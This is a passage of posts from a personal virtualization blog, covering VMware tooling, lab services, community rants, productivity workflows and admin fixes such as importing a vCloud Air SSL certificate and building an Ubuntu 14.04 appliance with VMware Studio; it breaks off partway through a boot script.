Any administrative interface that requires a browser add-on to work should be bagged, kidnapped, flung in the back of a van, and driven off somewhere never to be seen again. Sure, I understand that it's no easy task to rework all of these interfaces, and it takes real effort by skilled people. But please, please make it happen as soon as possible, and retrofit it into your existing systems - don't keep those stuck on older releases hanging, and only provide a solution for the latest and greatest version. While we as admins and consultants are used to having to patch our systems and keep current, please help us limit our own attack surface by removing requirements for add-ons and "special juice" just to be able to administer the solutions we depend upon to keep our businesses running. That can't be too much to ask, can it?

---

# Ravello Offers Free Lab Service for all 2015 vExperts

URL: https://vNinja.net/virtualization/ravello/ Date: 2015-06-19 Author: christian Tags: AWS, Lab, Nested ESXi, Ravello, vExpert

Ravello Systems has announced free lab service for all 2015 vExperts, which offers 1,000 free CPU hours per month for personal or home lab use. I was lucky enough to be one of the early VMware on AWS VIP Pass users, and I've been working on several setups the last few weeks. Hopefully I'll be able to make those available as blueprints in the new Ravello Repo, once they are ready for publishing. My experience with Ravello Systems so far can be summed up with one word: Awesome. The ability to quickly fire up a test environment, especially with nested ESXi hosts, is fantastic. In fact, a lot of the things I've been using my home lab for have been transitioned over and now run on demand on Ravello instead. The CPU and RAM requirements for a home lab have increased dramatically over the last few years, and the investment needed in hardware makes it difficult to keep up to date.
Now, my existing home lab can work for some workloads and scenarios, while others run on AWS via Ravello when I need them. It's the best of both worlds, just the way I like it.

---

# The "vCommunity"

URL: https://vNinja.net/rant/vcommunity/ Date: 2015-04-03 Author: christian Tags: Community, Rant

The recent months, and weeks, have made me question the value of the "vCommunity". I'm even questioning if there really is such a thing at all any more. I believe there was such a thing at one point, but it seems to be fading fast into history, only to be replaced by hyperbole of egonormous proportions. Back in the old days, and this might just be me showing my greying of beards moment, the hyperbole wasn't as strong a force as it seems to be today. As clickbait replaces journalism, hyperbole and FUD seem to be replacing what used to be based on technical merit.

I don't really understand why people spend enormous amounts of time on something, to just turn around and shit l over it. — Christian Mohn™ (@h0bbel) April 2, 2015

Yes, there is a typo in there; it was supposed to read "I don't really understand why people spend enormous amounts of time on something, to just turn around and shit all over it." Sure, I get it. You want to make a buck, and a name for yourself. This is completely understandable, I do the same thing. We all do, let's not kid ourselves and pretend we live in la la land where life is beautiful all the time, and we are all working together towards a better world, or even a better tomorrow. The truth is, we are not collectively working towards anything but our own self indulgence or self worth, or whatever might seem to be the best "move" at any given time. Harsh? You bet. Reality? It sure is. Take a moment, and read what Anthony Burke wrote in his Remember your Technical Integrity post. I simply could not agree more. If you choose to sacrifice your technical, or even moral, integrity for another paycheque, be my guest - that is your prerogative.
Just don't whine if I call you out on it, or simply stop listening to you. Just as you make your own choices, I sure as hell will be making mine. Please don't take this the wrong way, I'm not saying that you can't change your opinion about something. Or change employers. That's perfectly fine, completely natural, and even healthy - changing your personality, well, probably not as healthy. Also, it probably shows that your previous "personality" wasn't real either. Again, not so healthy. I'm pretty sure that's where unicorns come from. Fake personalities, with hidden agendas. I won't kid myself into thinking that I can influence this trend in any way, shape or form, or that things will go back to being what they once were, but I sure can make sure that I don't fall into the same trap myself. If I ever fall into the same category, by all means tell me, or even better, take me out back and give me a good old fashioned beating. As someone I respect once said about the community: There is none… It is a bunch of dicks and egos.

---

# VMware Software Manager - Changing Download Directory

URL: https://vNinja.net/virtualization/vmware-software-manager-changing-download-directory/ Date: 2015-03-13 Author: christian Tags: VMware, VMware Software Manager, vSphere 6

The new VMware Software Manager, which was released at the same time as vSphere 6, is a great way to get your download ducks in a row, and avoid manually downloading all the different vSphere pieces one by one. But all these downloads sure eat up disk space, and if you, like me, chose the wrong download location while installing VMware Software Manager, what do you do? There is no way in the web interface to change the download directory after installation, so how do you change it? There is a way through the GUI as well, but here is how to do it manually: it turns out that the configuration is stored in %appdata%\VMware\Software Manager\Download Service\Cfg\application.cfg, specifically under the [download] section.
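For illustration, the relevant part of that file looks roughly like this - the [download] section and the directory= key are what you are after; the path shown here is just a made-up example, as the actual value will be whatever you picked during installation:

```ini
[download]
directory=D:\VMware\SoftwareManagerDepot
```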
To change your download location, move your existing directory to a new location, and update the path under directory=. Then use Task Manager to kill the vsm_download_service.exe task(s) that are running, and restart it from the C:\Program Files\VMware\Software Manager\Download Service directory, and you should be all set to download to the new location.

Update #

It turns out that you can in fact change this setting through the GUI as well, just not via the web interface. If you right click the VMware Software Manager icon in your tray, you can change the location by choosing the Settings->Change Download Location option. I completely overlooked that when trying to change the location at first.

---

# vVotemageddon 2015

URL: https://vNinja.net/virtualization/vvotemageddon-2015/ Date: 2015-03-02 Author: christian Tags: blogging, Vote

As has become a yearly tradition, the vote is on. Pick your favorite VMware & virtualization blogs and give Eric Siebert loads of work.

Been a not fun few days trying to get that survey launched - 72,000 characters in the input file I had to build — Eric Siebert (@ericsiebert) March 2, 2015

I hope the good guys at Infinio, who sponsor Top vBlog 2015, also offer some assistance in doing some of the legwork required to get the results accumulated. Also, don't be an ass. Go cast your vote now.

---

# Starting a VMUG

URL: https://vNinja.net/virtualization/starting-vmug/ Date: 2015-02-27 Author: christian Tags: Community, Norway, VMUG

Last year, in November, the first ever meeting in VMUG Norway took place in my hometown of Bergen, and since then there have been meetings in Oslo, Trondheim, and a second one in Bergen as well. Getting the Norwegian VMUG up and running was a long process. I decided to have a go at it, and I spent a lot of time talking to people, thinking, planning and generally wondering how we could get it started and how to proceed. Some might say an inordinate amount of time, and they are right.
I'm lucky to have talented and passionate people on board with me for this; it is not something I have done on my own. But someone had to get the ball rolling. It turns out that all you need to get a VMUG running in your local area is to arrange one. It is really that simple. Don't overthink it and don't overcomplicate things. It really isn't that hard, and honestly, it really doesn't take that much effort either. Start small. A small venue and a few people go a long way. Admittedly, the Norwegian VMUG is small in comparison to our Danish counterparts, but we all have to start somewhere, right? Sure, we can grow bigger and better, and of course we will learn and improve as we go along. I for one am really excited by the possibilities VMUG Norway has going forward, and I hope the attendees share our passion for growing the local community. If they do, I'm sure VMUG Norway is destined for success and growth. If you plan on starting a local VMUG, just remember one thing: It is all about the U(sers), not the leadership or even the sponsors. Keep that in mind, and you're ready to go.

---

# Do you ChangeLog?

URL: https://vNinja.net/workflow/changelog/ Date: 2015-02-18 Author: christian Tags: ChangeLog, Ideas, Markdown, Workflow

In my work as a consultant I often have many small tasks to perform for customers, all while completing a bigger project. I have found that an easy way to keep track of all the little and big changes is to create a ChangeLog. Normally ChangeLogs are referenced in development projects, but it also makes sense to use one to keep track of your own, or your team members', changes to an infrastructure environment. As with just about everything else, I use Markdown to make it easy to format and edit.
Example #

Currently, I use the following format to keep track of changes done to a customer environment.

Completed #

| Date       | Task                                                                              | By |
|------------|-----------------------------------------------------------------------------------|----|
| 14.02.2015 | ChangeLog created                                                                 | CM |
| 15.02.2015 | Upgraded vCenter Operations Manager 5.8.3 Build 2076729 to 5.8.4 (Build 2199700)  | CM |
| 16.02.2015 | Updated _vCSA01_ from 5.5.0.20000 Build 2063318 to 5.5.0.20400 (Build 2442330)    | CM |
| 16.02.2015 | Updated _esxi01_ from 5.5.0 (Build 1623387) to 5.5.0 (Build 2456374)              | CM |
| 16.02.2015 | Updated _esxi02_ from 5.5.0 (Build 1623387) to 5.5.0 (Build 2456374)              | CM |
| 16.02.2015 | Updated _esxi03_ from 5.5.0 (Build 1623387) to 5.5.0 (Build 2456374)              | CM |

As you can see, this is a quick and easy way to document changes. Since the markdown files are pure text files, they can easily be converted to other formats with Pandoc, or checked into a "code"-repository for easy retrieval. Do you use a ChangeLog for your infrastructure, or how do you quickly document changes in your environment?

---

# The Real Value of the VCDX Certification

URL: https://vNinja.net/virtualization/real-vcdx-certification/ Date: 2015-02-11 Author: christian Tags: Certification, Epiphany, Framework, TOGAF, VCDX, VMware

The VMware Certified Design Expert: VCDX. THE certification of certifications, especially if you work with VMware based solutions. It's often regarded as the holy grail of certifications, and rightfully so. But why is this the case, and why does "everyone" want to become one? The reasons for it being such a highly coveted title are pretty obvious: Very few people can call themselves VCDX; at the time of writing, only 186 people have successfully defended their design.[^1] It represents something beyond being able to do well on a computerized test. You have to have actual soft skills as well, and be able to present advanced technical subjects in a coherent manner, in a possibly daunting environment.[^2] It is the highest level of certification you can obtain within the world of VMware.
I have, on numerous occasions, stated that my goal is to some day become a VCDX, and it still is. But the fact is that the more I study the requirements, and the more I think about it, the harder it becomes to achieve. This may sound counter-intuitive, but bear with me on this. At first glance, and I'm sure this doesn't just apply to me, it seems fairly simple. Get your VCP and VCAPs in order, submit a design, get it verified, defend, and boom, instant VCDX. Certainly not easy, but how hard can it really be, right? But is that all there is to it? Simply put, no, it is not. The VCDX program is about validating someone's skills as an architect, not teaching people to become architects. There is a huge gap to be filled between the VCP and VCAPs and the VCDX. Last fall I took a class in TOGAF 9.1, and that was a real eye-opener. Architecture itself is more about methodology and frameworks, and less about technology. The VCDX places itself in both the methodology and the technology space, requiring candidates to have one foot in each trench. That is a huge deal, and it really is like learning a new language, fluently. Until I had this revelation last year, I thought that the biggest obstacle to obtaining the VCDX certification would be producing the documents required, in the specified form factor, and presenting the design. That is not the case. The biggest hurdle is not documentation, it is not technology, and it's not presentation skills. It is the mindset and architecture skills that break the camel's back. It takes a special kind of person to be able to pull that off, and you know what? That is where the real value of the VCDX program lies. The more I learn, the more I realize that there is so much I don't know. While the purpose of the VCDX program is to validate, not educate, I am learning a lot by trying to obtain the skill set required. Call it a side-effect, but it's certainly not an adverse one.
Who knows, I might never actually become a VCDX, but one thing is very, very clear; I'm learning a lot while I stumble my way towards it. It's a moving target, but then again, what isn't, if you work in IT? Also, becoming a VCDX is not like beating that Final Boss in Doom II; it's a new start, not an end.

[^1]: If more than 186 people actually call themselves VCDX, some of them are outright lying. Check the official directory for verification. ↩
[^2]: For a complete list of requirements, look at the official blueprint for the chosen track.

---

# The vSphere 6.0 Launch and The Misinformation Effect

URL: https://vNinja.net/vmware-2/vsphere-6-0-launch-misinformation-effect/ Date: 2015-02-10 Author: christian Tags: Beta, Misinformation, NDA, VMware, vSphere

Have you ever wondered what happens if you give 10.000 people access to an open beta that is supposed to be under NDA? Firstly, the NDA is a no-go from the get-go. There is no way you can claim that you actually expect 10.000 people not to talk about something they know about. VMware vSphere 6.0 was the worst kept secret ever, for a reason. It might have been planned that way all along for all I know, but if that was the case, the NDA should never have been in place to begin with. Secondly, what happens when said product finally gets announced, and scores of people have pre-made blog content about all the new, and presumably secret, features? A lot of it is wrong, because people have been writing about features that have either been dropped or changed come release time. So, now what do you do? Well, VMware decided to "Clarify the misinformation". I'm sorry, but all of this reads as a text-book way of not handling things. So, here is my own personal advice to VMware for the next round:

Do #

Decide on a beta format. If you do an open beta, drop the NDA and have people discuss it. If you do a closed beta, that's fine too; invite people and slap an NDA on it. No problem. You can't really have it both ways.
If you solicit blog posts for publicity reasons during a launch event, do the bloggers a favor and tell them, beforehand, if something has changed or been dropped since the beta. If you don't trust them not to leak information, what was the NDA worth to begin with?

Don't #

Don't solicit blog posts, and then call it misinformation if things have changed and you haven't informed anyone of it. That's just plain rude. Come on VMware, you have been able to do things like this before, without these kinds of problems. I'm sure you can do it again. As for the title of this post? Have a look at The misinformation effect.

---

# Dude, where is my VAIO?

URL: https://vNinja.net/virtualization/dude-vaio/ Date: 2015-02-03 Author: christian Tags: Gorilla, SanDisk, VAIO, vSphere 6

New Update: #

Alex Jauch, VAIO Product Manager, has provided an update on why there has been so little information available, and when to expect that to change.

Updated #

Since this post was initially published, information about the VAIO capabilities in vSphere 6.0 has been published. In vSphere APIs for IO Filtering, Ken Werneburg goes through the details on how it works, and how partners will get access through an SDK some time in the coming months. I guess that the lack of announcement hoopla at PEX regarding this is simply due to the SDK not being available at vSphere 6.0 time. I'm very glad to see VAIO talked about, and that it hasn't gone completely AWOL.

Original post #

vSphere 6.0 was announced yesterday, with a bucketload of new features and capabilities. However, there seems to be a missing piece in the puzzle. Where did vSphere APIs for I/O Filters (VAIO) go? vSphere APIs for I/O Filters (VAIO) is, simply put, a framework intended to allow VMware partners to plug their products/features directly into the VM I/O path. Basically this means that third parties would be able to offer Data Services directly in the storage data stream.
That opens up a world of possibilities, like compression, deduplication, and even cool stuff like distributed caching or native IO replication. All of this directly, without the need to leave the hypervisor. Keeping your Data Services close to the compute makes sense. Opening up for such tight integration is a win-win for VMware, as they can offer their own services on top of the hypervisor, or let customers choose to run a third party filter. Either way, the hypervisor is the same, and it's VMware's ESXi. So, where is it? I can't find a single reference to VAIO in the vSphere 6 release. Even SanDisk seems to be quiet about it, after announcing that they were VMware's design partner on VAIO:

> SanDisk was selected to be VMware's design partner for the APIs for IO Filtering for server-side solid-state caching, to help design and develop the APIs. The FlashSoft team at SanDisk are not only working on the API design, but we are actively working on implementing our next version of FlashSoft for vSphere based on the vSphere APIs for IO Filtering in ESXi 6.0. We plan to have our product ready for the launch of ESXi 6.0 early next year.

Isn't it a bit strange that this was a big deal back in August 2014, and come the vSphere 6 announcement in February 2015, all is quiet on the western front? Other than the Storage Field Day video, it seems a bit quiet at the moment. I guess no-one notices the gorilla after all. Not even the industry storage experts, who seemingly also have overlooked the omission of any mention of VAIO in the vSphere 6 release.
I guess this proves that the eyes really are the first thing to go…

---

# A great disturbance in the Force

URL: https://vNinja.net/virtualization/great-disturbance-force/
Date: 2015-02-02
Author: christian
Tags: Agile, Speculation, VMware, Waterfall

So, the cat formerly known as vSphere.next is finally out of its rather big bag, and vSphere 6.0 has been officially announced and will be available some time in Q1 (no date has been announced yet). There are enough posts going into detail on what is new and what has been announced, so I won’t be going over that right now. If you want to hear me talk about vSphere 6.0 and related news, you can always attend VMUG Norway on the 19th of February. I do however have some other comments to make, and perhaps some observations that might have passed below radar altitude in all the announcement hoopla. Some read this as “VMware is shifting to offering new features on their own cloud services first, then on premises later”; I don’t. I believe this signals a monumental shift in how VMware handles releases and offers new features. I wouldn’t be surprised if vSphere 6, and related products, is one of the last, or even the last, monolithic release they do. My take on this is that VMware is moving towards adopting more of a cloud culture in how it handles development. Goodbye waterfall development, hello Agile development. Sure, Agile development and cloud provide checkboxes in any decent buzzword-bingo game, but if we are to believe in cloud, DevOps and a truly Software Defined Data Center, the color of the development carpet needs to match the drapes. It’s not about treating on-premises customers as second-class citizens, it’s about actually practicing what you preach. The next big thing might just start as a fling and end up as a feature, and you might not have to wait until v7.4 to get it. “Cloud first” doesn’t mean “vCloud Air first”, it just means that you and me can get our hands on the naughty bits earlier.
I must admit, I kinda like that. Of course, all of this is just speculation. There might not be a carpet to match at all.

---

# Veeam Backup & Replication 8: RPC error:Access is denied Fix

URL: https://vNinja.net/virtualization/veeam-backup-replication-8-rpc-erroraccess-denied-fix/
Date: 2015-01-18
Author: christian
Tags: Backup, Troubleshooting, Veeam

I recently set up a new Veeam Backup & Replication v8 demo lab, and my initial small job, consisting of two different Linux VMs and one Windows Server 2012 R2 Domain Controller, was chugging along nicely. I had one minor issue from the start though: file indexing consistently failed for the Windows VM. No big deal, but I thought it was strange at the time. After all, the Linux VMs were indexed just fine. Fast forward a few days, and all of a sudden Veeam B&R was unable to back up the Windows VM at all, failing with the following error:

```
18.01.2015 19:48:01 :: Processing Joey Error: Failed to check whether snapshot is in progress (network mode).
RPC function call failed. Function name: [IsSnapshotInProgress]. Target machine: [192.168.5.5].
RPC error:Access is denied. Code: 5
```

Nothing had changed in my environment: no patches had been installed, no changes made to the backup job or the credentials used. I even tried deleting the job, this is a demo environment after all, and re-creating it, but with the same end result. As the Access is denied message clearly states, this had to be related to permissions somehow, but I was using domain administrator credentials (again, this is a lab), so all the required permissions should be in place, and the credentials test in the backup job also checked out just fine. It had also worked fine for 5 or 6 days, so I was a bit baffled. In the end, I tried changing from the User Principal Name (UPN) notation of administrator@domain.local in the credentials for the VM to the Down-Level Logon Name, aka domain\administrator, and retried the job.
That did the trick, and it also fixed the indexing problems I’d had since setting up the job in the first place. According to this Veeam Community Forum thread, this was also a problem in v7 and has something to do with how the Microsoft APIs work. So, if your Veeam Backup & Replication jobs fail with access denied messages, and/or can’t index the VM files, check your credentials. They may work, but they might just be entered in the wrong format.

---

# 2015: Let's DOS IT!

URL: https://vNinja.net/misc/2015-dos-it/
Date: 2015-01-16
Author: christian
Tags: 2015, Personal, Prediction

Inspired by Scott Lowe’s Looking Ahead: My 2015 Projects, I’ve decided to do something similar. Since I didn’t post anything like this in 2014, I can’t really go back and see how my plans turned out, or provide any assessment of them. I can say this though: 2014 was pretty awesome. I got a promotion, my vExpert status was renewed, vNinja was voted into the top 50 of the 2014 top VMware & virtualization vote, I published a book and finally got the Norwegian VMUG up and running. My VCAP-DCA 550 should be on this list as well, and so should my failure to achieve VCAP-DCD certification status. 2014 was also the busiest year in vNinja.net’s history, with close to a doubling of traffic generated through the year. The same goes for vSoup; some of the episodes we recorded in 2014 had some rather insane listening numbers… Last year was also the year I realized that becoming a real, proper IT architect takes work. Real work. I’m not there yet, but I will be. All in all, 2014 will stand as a good year for me professionally. Not perfect, but good. But here’s the thing: how much of this was planned, and how much of it was made up on the fly? Honestly, most of it is due more to circumstances than deliberate actions on my part, and that’s the main thing I want to change in 2015. 2014 is done and dusted, let’s get on with what’s to come. So here it is, my own 2015 bucket list.
- Completely master Markdown - I want Markdown to be a part of my muscle memory, so that I don’t have to think and look up formatting. The possibilities when combined with Pandoc are pretty amazing, and so far I’ve only scraped the surface. So, Markdown will be my go-to markup language for just about anything I write in 2015.
- Get more organized - As mentioned before, things often happen without me actively seeking or planning to do something. This has to change in 2015. Getting more organized, and reducing the amount of digital clutter, will help me focus on the things that matter to me and my business. No, I’m not turning into a life coach, nor am I trying to be the most organized man in the world (trust me, that will never happen), but I need to get my stuff together in a coherent manner - and stick to it. This is probably more of an effort than most people realize.
- Write better blog posts - This is an easy one, really. I have always regarded blog posting as a spur-of-the-moment thing, writing about something whenever I feel like it. Often written very quickly and posted immediately. I might still do quite a few of those posts in 2015, but I plan on really working on how I publish, when I publish and what I publish. Hopefully this will mean better blog posts, as I’ve always thought that quality beats quantity any day.
- Get that VCAP-DCD certification - If there is one single thing that 2014 taught me, it is that if I want something, I have to make an effort. I was close to passing it, very close in fact. Perhaps it’s just my age starting to show, I don’t know, but I’m certain that if I genuinely try, I’ll get stuff done. I want to get this box ticked, in order to make the next step towards VCDX. I don’t think 2015 will be the year I defend, but I sure want all the other tickboxes to be ticked as soon as possible. One does not simply become an architect.
- Redesign vNinja - vNinja will be redesigned in the near future.
I’m not going the route of all the other cool kids and moving to some other publishing platform, but it will get a new, cleaner and simpler look. And those, as they say, are the broad strokes. There is a theme here, and the theme is pretty simple. In 2015, I will: Declutter, Organize and Simplify (DOS). I wish myself good luck.

---

# Markdown All the Things!

URL: https://vNinja.net/virtualization/markdown-things/
Date: 2015-01-12
Author: christian
Tags: Automator, Content Creation, GitHub, Markdown, OS X, pandoc, Workflow

Obviously I’m a bit late to the party here, but I guess late is better than never. It recently dawned on me that mucking about with lots of different file formats, interfaces and ways of doing things is rather counterproductive. A lot of my work these days is related to generating content, be it a simple blog post like this or writing customer proposals and documentation. In the end, the deliverables are often quite different, but at the core they are strangely enough very similar. After all, the main thing is content, right? The file format itself, or how it is generated, doesn’t really have a bearing on the content at all, it’s just a delivery method. Lipstick on a pig, if you will. So, in an effort to get rid of a lot of unnecessary visual and mental clutter, I’ve decided to go all in and Markdown all the things. After all, Markdown is just text, with some simple formatting options. No fluff, no convoluted UIs, just text. Plain, simple, and very easy to work with. I currently use atom.io as my preferred editor, which is working out very well so far. Of course, from time to time my deliverables might just be a .PDF file, or even a Microsoft Word document, but there are ways to work with that and still keep Markdown as the core content creation engine. I’ve just put my first foray into Automator on GitHub.
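The core conversion behind this kind of workflow can be sketched with a couple of pandoc commands. This is a minimal sketch, not the actual GitHub workflow: the file names are illustrative, and pandoc needs to be on the PATH.

```shell
# Create a small Markdown file to convert (contents are illustrative)
printf '# Meeting notes\n\nSome *Markdown* content.\n' > notes.md

# Convert Markdown to .docx; pandoc infers the output format
# from the target file extension
pandoc notes.md -o notes.docx

# To make the output pick up corporate styles, point pandoc at a Word
# reference document (the flag name depends on the pandoc version:
# newer releases use --reference-doc, older ones used --reference-docx):
# pandoc notes.md -o notes.docx --reference-doc=template.docx
```

Since pandoc picks the output format from the extension, the same pattern extends to PDF or HTML targets as well.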
The Auto-convert .md to .docx is a simple Folder Action that runs pandoc to automatically convert files put into a given folder to .docx format. It’s simple and it’s crude, but it works. Next I’ll be looking into how I can use pandoc with a Microsoft Word reference file, to make sure that the generated files adhere to the corporate templates I normally use, but for now this does the job. I also plan on extending this to convert to other file formats as I need them, now that I’ve got this first one up and running. Do you use Markdown or pandoc? If so, please let me know how - I know I’m only scraping the surface of what is possible to do here, and any tips and hints on what to do next will be very welcome! Now, if only Evernote would support Markdown natively…

---

# Importing vCloud Air SSL Certificate on the vCenter Server Appliance 5.x

URL: https://vNinja.net/vmware-2/importing-vcloud-air-ssl-certificate-vcenter-server-appliance-5-x/
Date: 2014-12-12
Author: christian
Tags: Certificate, SSL, vCenter, vCenter Web Client, vCloud Air, VCSA

I’m playing around a bit with vCloud Air and Virtual Private Cloud OnDemand, and in order to set up the vCloud Hybrid Service plugin in the vSphere Web Client you need to import the vCloud Air SSL certificate into vCenter. If the certificate isn’t present in the vCSA keystore when you try to authenticate with vCloud Air, you get a “Server Certificate not Verified” error, and you will be unsuccessful in configuring the plugin. The Using the vCloud Hybrid Service vSphere Client Plug-in document outlines how this can be accomplished, but it’s based on downloading the SSL certificate via a browser and then importing it into the vCenter keystore. Since I mostly run the vCenter Server Appliance, I didn’t want to bother with downloading it from one of my desktops and copying the files over to the vCSA for import. I mean, there has to be a better way to do that, via the command line, right?
Indeed there is. This little one-liner downloads and formats the certificate from vchs.vmware.com to /tmp on the vCSA, and then proceeds to import it into the keystore:

```
echo -n | openssl s_client -connect vchs.vmware.com:443 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > /tmp/vchs.cer && /usr/java/jre-vmware/bin/keytool -alias vchs -v -keystore /usr/lib/vmware-vsphere-client/server/configuration/keystore -storepass changeit -import -file /tmp/vchs.cer
```

All you have to do is press ‘y’ to confirm the import:

```
Trust this certificate? [no]: y
Certificate was added to keystore
[Storing /usr/lib/vmware-vsphere-client/server/configuration/keystore]
vcenter:/tmp #
```

And there it is; you can now add your vCloud Air credentials via the vSphere Web Client, without having to copy any files from your browser/desktop to the vCSA.

---

# Combining Todoist and Evernote, because awesome

URL: https://vNinja.net/workflow/combining-todoist-evernote-awesome/
Date: 2014-12-03
Author: christian
Tags: automation, Evernote, IFTTT, Organization, Productivity, Todoist

A while back I declared Evernote bankruptcy, even if I managed to misspell it while doing so:

That's it, I'm declaring @evernote bankrupcy. — Christian Mohn™ (@h0bbel) May 22, 2014

The thing is, I really want to use Evernote in a proper and organised manner. The problem is, I was completely unable to do so, mostly since I had no clear idea of the how, the when and the why back when I started using it many moons ago. In the end, all I had was a lot of unorganised notes, with no clear idea or taxonomy. So, to get myself out of the mess I had made, I decided to delete all my notebooks and stacks, and move every single note I had into a new @graveyard notebook. I then decided on a new top-level notebook hierarchy that I wanted to make general enough to fit most notes into, but still keep reasonably structured.
For now, I’ve decided on the following structure (I’ve excluded a couple here, but you get the gist):

- @Graveyard
- @Inbox
- @To-Do
- @To-Blog
- Personal
- Professional
- Clippings

So far this works really well, and it’s easy to find a fitting notebook to place new notes in. I have yet to really do the required cleanup of tags to also make sure that I’m consistently using a sensible taxonomy, but I’m getting there slowly. For more tips on how you can organize Evernote, check out Matt Brender’s The Non-obvious Guide to Evernote Awesomeness. I clearly need to have a closer look at the suggestions Matt has about using tags! I realize that the title of this post has nothing to do with how I managed to get control over my Evernote content again, but rather how I use it in conjunction with Todoist. So here it is: as with most other popular online services, both Todoist and Evernote integrate with IFTTT. I’ve set up a recipe that automatically creates a new note in my @To-Do notebook when a new task is added in Todoist. Pre-formatted notes like this make it easy to fill out detailed information for the task in Evernote, without cluttering the Todoist tasks with information that is better stored and indexed in Evernote. The pre-formatted notes look like this: In addition to this, I’ve created a saved search in Evernote called “Daily Review” (any: created:day updated:day) that shows me all notes that have been created or updated the same day, to give me a quick overview. Not quite GTD, but better than total anarchy and disarray. I also have IFTTT recipes for putting the tweets I favorite into Evernote, so I can reference and move the ones I want to inspect further into either @To-Read or @To-Learn. So far, so good. At least there is some level of organization to my Evernote madness now, and that has to be a good thing.

---

# EVO:RAIL: Doing the meth-math.
URL: https://vNinja.net/virtualization/hyperconvergence-meth-math/
Date: 2014-12-01
Author: christian
Tags: EVO:RAIL, Hyperconverged, Licensing, VMware

Howard Marks has published a post I’ve been meaning to do myself, but to be honest, I’m glad Howard put it out there. His is way more researched and comprehensive than mine would ever have been. In his The True Cost Of Hyperconvergence article, Howard compares buying a new EVO:RAIL system with building your own, complete with the required hardware, licenses and support contracts. The result might come as a surprise to some… One question Howard doesn’t ask though is this: what happens to the bundled VMware licenses after the initial three years? The initial cost of the EVO:RAIL includes 3 years of SnS, but what happens in year 4? I guess you can buy more years of support, and extend the period easily, but I have not verified this in any way. But this opens up another question: what happens when you replace your EVO:RAIL after 3, 4 or 5 years? Do you have to buy a new one, complete with new licenses, even if you have paid SnS for the entire period, and what happens to the bundled VMware licenses when you replace your EVO:RAIL? As far as I can see, the licenses follow the hardware (think Microsoft OEM licensing here), so if you decide to replace it, you have to acquire new licenses for your new hardware. At least Microsoft offers OEM licenses at a discount. So it seems that not only do you not get discounted VMware licenses when you purchase an EVO:RAIL, you also don’t get to keep the licenses if you ever replace the hardware. Don’t get me wrong here, I love the EVO:RAIL concept and I had really high hopes for it, but sadly I feel that VMware has missed the mark here by quite some margin. In my opinion this could have made real ripples in a lot of datacenters, and helped smaller businesses “get with the SDDC program”, but with its current price point and licensing issues, I just don’t see it happening.
As a concept it’s really solid. As a physical form factor, it’s brilliant. As a quick delivery method for quite complex software, it’s amazing. Sadly all of this comes at a premium, a premium I’m unsure the market is really willing to pay, at least not in its current iteration.

---

# Nordic VMUG Conference 2014

URL: https://vNinja.net/virtualization/nordic-vmug-conference-2014/
Date: 2014-10-22
Author: christian
Tags: Awesome, conference, Copenhagen, Denmark, VMUG, VMware

Last year I was lucky enough to get to travel to Copenhagen and visit the Nordic VMUG conference. Sadly it doesn’t seem like I’ll be able to make it this year, but don’t let that stop you! While we in Norway are still trying to get our local VMUG up and running, more news on that in a very short while, the Danish VMUG is really the driving force and the leading star for the rest of us in the Nordics. Last year’s conference was awesome, and the 2014 edition looks no different. A quick glance at the agenda shows a bunch of familiar names:

- Frank Denneman, PernixData
- Kamau Wanguhu, VMware
- Duncan Epping, VMware
- Raymon Epping, Nutanix
- Chris Wahl, Ahead
- Paudie O’Riordan, VMware
- Cormac Hogan, VMware
- Shawn Bass, VMware
- Hugo Phan, Atlantis Computing

The topics range from NSX and VMware vSphere futures to various storage topics, backup, security and flash acceleration. All in all, the lineup and topics look great; it seems that once again VMUG.dk is creating their own mini-VMworld in Copenhagen. It’s once again held in the Bella Center, the same venue that hosted VMworld EMEA back in 2010, when everyone complained about the cold weather and high prices. So, if you can, go register now.
I can guarantee you that you will not regret it, and I really wish I could join in this year as well. Perhaps next year, and I might even have a speaking slot then, who knows…

---

# Building an Ubuntu 14.04 Appliance with VMware Studio 2.6

URL: https://vNinja.net/vmware-2/building-ubuntu-14-04-appliance-vmware-studio-2-6/
Date: 2014-10-07
Author: christian
Tags: Appliance, Hack, Ubuntu, Unsupported, VMware Studio

VMware Studio 2.6 was released way back in March 2012, and surprisingly there seems to be no new update in sight. While VMware Studio technically still works, even with newer versions of ESXi and vCenter, the supported operating systems for the appliances it can build are somewhat outdated:

- Red Hat Enterprise Linux 5.5/6.0
- SUSE Linux Enterprise Server 10.2/11.1
- Ubuntu 8.04.4/10.04.1
- Windows Server 2003 R2 / 2008 R2 w/SP1

The Problem #

For a yet to be announced project we are working on internally at EVRY, we needed to build an appliance based on newer software packages and development tools. Recent events like Heartbleed and Shellshock also highlight the need to build new appliances on new and supported distributions. Attempts at upgrading an existing Ubuntu 10.04.1 appliance to 14.04 failed miserably, due to architectural changes between the Ubuntu versions and how the Virtual Appliance Management Infrastructure (VAMI) is installed by VMware Studio, and in the end we were pretty much left with two options:

1. Build the appliance from scratch, and lose VAMI, which was one of the primary reasons for building the appliance with VMware Studio in the first place.
2. Find a way to build the appliance with Ubuntu 14.04, with VMware Studio.

Option 1 felt a bit like giving up, and option 2, well, that was a challenge we couldn’t just walk away from.

The Solution #

Thanks to the brilliant mind of my coworker Espen Ødegaard, we were able to come up with a set of solutions that does the trick.
First, we added a new OS profile to VMware Studio by connecting to the VMware Studio VM via SSH and issuing the following command:

```
studiocli --newos --osdesc "Ubuntu14.04" --profile /opt/vmware/etc/build/templates/ubuntu/10/041/build_profile.xml
```

Basically this creates a new OS template in VMware Studio by copying the existing Ubuntu 10.04.1 profile. Next, edit line 462 in /opt/vmware/etc/build/templates/Ubuntu14.04/Ubuntu14.04.xsl and change scd0 to sr0:

```
if ! mount -t iso9660 -r /dev/scd0 /target/${cdrom_dir} ; then \
  if ! mount -t iso9660 -r /dev/hda /target/${cdrom_dir} ; then \
    cdrom_mounted=0; \
  fi ; \
```

This fixes a problem with the appliance not being able to mount the Ubuntu installation ISO when it is built. Place the Ubuntu 14.04 ISO in /opt/vmware/www/ISV/ISO, and create a new build profile using the VMware Studio web interface. Now, before an appliance can be built, we need to fix some other problems that prevent VAMI from starting up and prevent login to the VAMI web interface. First off, make sure that libncurses5 is added as a package under Application -> List of packages from OS install media. Next, add the following to the first boot script under OS -> Boot Customization to work around those problems:

```
# Create symlinks required for Ubuntu 14.04 and VAMI
# Copy and symlink libncurses to the location VAMI looks for them
cp /lib/i386-linux-gnu/libncurses.so.5.9 /opt/vmware/lib/
rm /opt/vmware/lib/libncurses.so.5
